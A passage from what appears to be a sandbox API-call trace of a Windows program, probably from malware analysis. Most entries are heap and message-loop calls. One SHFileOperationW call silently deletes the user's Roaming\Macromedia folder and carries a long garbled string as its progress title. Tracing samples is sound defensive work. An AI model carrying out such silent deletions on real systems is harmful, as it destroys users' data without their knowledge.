Size=0x18) returned 0x29f6f40 [0123.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0123.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0123.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0123.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0123.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0123.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0123.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0123.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0123.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0123.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0123.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5f960 [0123.227] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Macromedia", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpFilePart=0x8cf650*="Macromedia") returned 0x2a [0123.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f960 | out: hHeap=0x2af0000) returned 1 [0123.227] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia")) returned 0x10 [0123.227] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0124.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0124.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0124.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0124.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0124.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0124.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0124.210] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0124.210] TranslateMessage (lpMsg=0x8cf968) returned 0 [0124.210] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0124.211] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0124.211] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0124.211] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0124.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0124.211] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0124.211] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0124.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0124.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0124.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0124.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0124.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0124.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0124.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0124.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0124.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0124.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0124.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0124.211] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0124.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0124.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0124.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icrosoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0124.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crosoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0124.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rosoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0124.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="osoft", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0124.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0124.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0124.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0124.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0124.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0124.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0124.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0124.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0124.212] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0124.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0124.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0124.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0124.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0124.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0124.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0124.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0124.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0124.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0124.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0124.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0124.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0124.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0124.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0124.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0124.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0124.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0124.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0124.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7180 [0124.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0124.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Microsoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0124.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icrosoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0124.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="crosoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0124.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rosoft", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0124.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0124.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0124.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0124.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0124.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0124.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0124.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0124.216] HeapFree (in: 